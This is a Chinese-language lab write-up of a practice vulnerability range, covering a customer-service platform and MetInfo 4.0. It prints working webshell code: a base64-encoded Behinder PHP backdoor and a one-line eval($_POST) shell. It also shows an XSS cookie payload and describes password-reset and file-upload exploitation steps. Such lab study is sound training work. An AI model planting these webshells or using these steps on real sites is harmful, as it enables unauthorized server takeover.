渗透学习-极核靶场-朵米客服平台

前言

在微信找到的一个在线靶场里面集成了dvwa,Pikachu,Sqli-Labs等多个环境，打算学习下，介绍信息：极核靶场，一个专为网络安全爱好者和专业人士打造的免费漏洞靶场。在这里，您将有机会通过实践学习网络安全知识，并提升您的技能。为了确保您能够充分利用我们的平台，点击查看详细的使用说明。

 漏洞复现练习靶场

一、朵米客服平台

打开网址,后注册一个账号

登录后发现在系统设置➡开关设置；系统设置➡广告设置；实名认证 三个位置都有上传功能，分别用burp抓了一下包发现系统设置➡开关设置并不能上传文件，其余两个都可以，这里我们用系统设置➡广告设置来做演示：

看到data:image/png;base64,说明我们要上传一个base64编码的webs hell ,我这里使用冰蝎php写的web shell,所以应该改写成data:image/php;base64；

打开冰蝎

把生成的shell.php 里面的内容复制出来随便找一个在线编码网页(CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码 (hiencode.com))编码为base64

PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKZnVuY3Rpb24gRGVjcnlwdCgkZGF0YSkKewogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAogICAgJGJzPSJiYXNlNjRfIi4iZGVjb2RlIjsKCSRhZnRlcj0kYnMoJGRhdGEuIiIpOwoJZm9yKCRpPTA7JGk8c3RybGVuKCRhZnRlcik7JGkrKykgewogICAgCSRhZnRlclskaV0gPSAkYWZ0ZXJbJGldXiRrZXlbJGkrMSYxNV07IAogICAgfQogICAgcmV0dXJuICRhZnRlcjsKfQokcG9zdD1EZWNyeXB0KGZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpKTsKQGV2YWwoJHBvc3QpOwo/Pg==

把编辑好的代码放到burp 里面重发(Repeater)后看看结果

能看到路径，我们放到冰蝎里面链接一下。网址+路径

双击运行看到链接成功

在文件管理根目录看到flag

二、MetInfo 4.0

首页：

拿到这个网页后我第一时间想的就是用dirsearch扫描一下（dirsearch 可以扫一下网站下有什么目录和网址 用python写的一个代码 扫描结果放在reports）

我就拿之前扫过现在已经过期了的页面做个演示：

在等待扫描的过程中我随便点击页面玩了玩发现了几点。

1.只要用了搜索框网页就无法访问状态码都没有

2.用户注册藏得好深在下载中心➡查看详细点击后提示没有权限才跳转到登录页面而且admin是存在的，我后面就换成了admin111

3.进去后看到了能留言怀疑能上xss试了试果真可以输入<script>alert(document.cookie)</script>

再点回个人中心看看留言

这也算一个漏洞吧，但是拿不到flag

好了看看跑完的dirseach输入这个路径看看好吧跟我们跑出来的差不了多少

输入admin路径可以进到一个新的页面管理员界面(好奇输入/admin不行得/admin/)

后面查了一下metInfo4.0的任意用户密码重置漏洞 原来抓一下包修改为admin就行了

好了成功进入，接下来就剩下文件上传shell了，我几乎把能上传的地方都上传了有些限制PHP，后面发现有两个地方可以在burp中改type识别类型后上传php脚本，一个是MetInfo网页的logo还有一个是数据与备份，但是都没有用。后面参考了【靶机实战】MetInfo4.0 文件上传漏洞复现 - 极核GetShell (get-shell.com)

上传带有shell.php压缩包

发现了上传在模板管理的shell会自动解压到templates中

链接到了但是不知道为啥拿不到，我后面打算换个shell再试试

 

换了一个shell

一句话木马：

<?php
@eval($_POST['hack']);
?>

用蚁剑,密码是hack

终于拿到了flag ：GetShell{2c8d8914-17be-d238-13ef-9df9cd4eedaa}